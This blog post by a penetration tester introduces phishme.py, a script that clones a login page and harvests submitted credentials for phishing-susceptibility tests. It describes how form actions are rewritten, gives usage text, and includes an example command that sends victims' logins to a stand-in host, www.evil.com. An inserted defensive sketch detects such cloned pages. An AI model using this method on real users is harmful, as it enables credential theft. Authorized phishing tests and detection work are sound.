Adventures in Penetration Testing: Let’s Go Phishing
Phishing and social engineering engagements are often unique to each customer; however, I often find that a customer just wants one of their web pages, like their web email sign-on page, copied. The link to this phishing site is then emailed out to the victims to determine how susceptible they are to clicking on the link and entering credentials.
The standard process is to use httrack to download a copy of the page, then modify the FORM tag to POST/GET to our phishing site, save whatever values are submitted, and redirect to the real page. This is a bit of a pain because the process is fairly manual. I know you can use something like the Social Engineering Toolkit (SET), but that can be a pain to set up and is often a little heavy duty for what my company needs.
I recently began learning Python, which I love so far by the way, and thought that this might be a good area in which I could develop something useful. So I wrote a phishing script that will take the URL you point it at and replicate it, replacing the FORM ACTION with your host, logging all entered data, and forwarding the victim on to their site (along with what they submitted).
The script does this by downloading the base HTML for the page and ensuring A, IMG, LINK, and SCRIPT SRC tags point back to the original site, while modifying the FORM ACTION tag to point back at the malicious site. This is simple in that very little is downloaded and it leaves little room for something to get messed up in the visual presentation.
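A page built this way keeps its A, IMG, LINK, and SCRIPT references on the original site while only the FORM ACTION points elsewhere, and that host mismatch is something a defender can check for. The sketch below is an added example, not part of phishme.py or the original post; the function names, the 0.8 threshold, and the sample pages are constructed assumptions.

```python
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

class _Refs(HTMLParser):
    """Collect hosts of A/IMG/LINK/SCRIPT references and password-form actions."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url, self.hosts, self.forms = page_url, Counter(), []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":  # an empty or missing action posts back to the page itself
            self.forms.append([urljoin(self.page_url, a.get("action") or ""), False])
        elif tag == "input" and (a.get("type") or "").lower() == "password" and self.forms:
            self.forms[-1][1] = True  # mark the enclosing form as credential-bearing
        elif tag in ("a", "link", "img", "script"):
            ref = a.get("href") if tag in ("a", "link") else a.get("src")
            host = urlsplit(urljoin(self.page_url, ref)).hostname if ref else None
            if host:
                self.hosts[host] += 1

def clone_indicators(page_url, html, min_share=0.8):
    """Flag password forms on a page whose assets mostly live on another host."""
    refs = _Refs(page_url)
    refs.feed(html)
    if not refs.hosts:
        return []
    page_host = urlsplit(page_url).hostname
    top_host, hits = refs.hosts.most_common(1)[0]
    if top_host == page_host or hits / sum(refs.hosts.values()) < min_share:
        return []  # assets are local or spread across hosts: not the cloned-page pattern
    return [{"assets_from": top_host, "form_posts_to": urlsplit(action).hostname}
            for action, has_pw in refs.forms
            if has_pw and urlsplit(action).hostname != top_host]

# Constructed sample pages (not real captures); hostnames are placeholders.
CLONE_URL = "https://login.example.net/"
CLONE_HTML = """<html><head><link href="https://www.example.com/site.css" rel="stylesheet">
<script src="https://www.example.com/app.js"></script></head><body>
<img src="https://www.example.com/logo.png"><a href="https://www.example.com/help">Help</a>
<form action="https://login.example.net/" method="post">
<input type="text" name="user"><input type="password" name="pass"></form></body></html>"""
LEGIT_URL = "https://www.example.com/login.php"
LEGIT_HTML = """<html><head><link href="/site.css" rel="stylesheet"></head><body>
<img src="/logo.png"><form action="/auth" method="post">
<input type="password" name="pass"></form></body></html>"""

if __name__ == "__main__":
    for url, page in ((CLONE_URL, CLONE_HTML), (LEGIT_URL, LEGIT_HTML)):
        print(url, clone_indicators(url, page))
```

Run over pages fetched by a mail gateway or URL sandbox, a non-empty result means the page borrows its look from one host while sending a password field somewhere else.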
The script relies on Mechanize, BeautifulSoup4, and CherryPy. These can be installed with:
easy_install mechanize beautifulsoup4 cherrypy
Some features that I would like to add include:
- Integrate with the Browser Exploitation Framework (BeEF)
- Add the ability to step through a few clicks, rather than a simple one page reflect back and then redirect
This is the first script I have written in Python, so it is probably pretty ugly to anyone with experience in the language. You can download here and enjoy with:
usage: phishme.py [-h] --phish PHISH --replace REPLACE [--port PORT] [--ssl] [--sslchain SSLCHAIN] [--sslcert SSLCERT] [--sslkey SSLKEY]

Automatically setup a phishing site.

optional arguments:
  -h, --help           show this help message and exit
  --phish PHISH        the full URL to phish back to the victim (must include http(s):// (default: None)
  --replace REPLACE    the IP/FQDN to replace FORM actions with (must include http(s):// (default: None)
  --port PORT          the port to start the listening web server on (default: 80)
  --ssl                enable SSL on the running port (default: 0)
  --sslchain SSLCHAIN  certificate chain file to use when ssl option is enabled (default: chain.crt)
  --sslcert SSLCERT    certificate file to use to use when ssl option is enabled (default: ssl.crt)
  --sslkey SSLKEY      private key file to use to use when ssl option is enabled (default: ssl.key)

Example: phishme.py --phish https://www.victim.com/login.php --replace https://www.evil.com --port 443 --ssl --sslchain chain.crt --sslcert ssl.crt --sslkey ssl.key
Comment back for some optional features that you think would be useful for this lightweight script.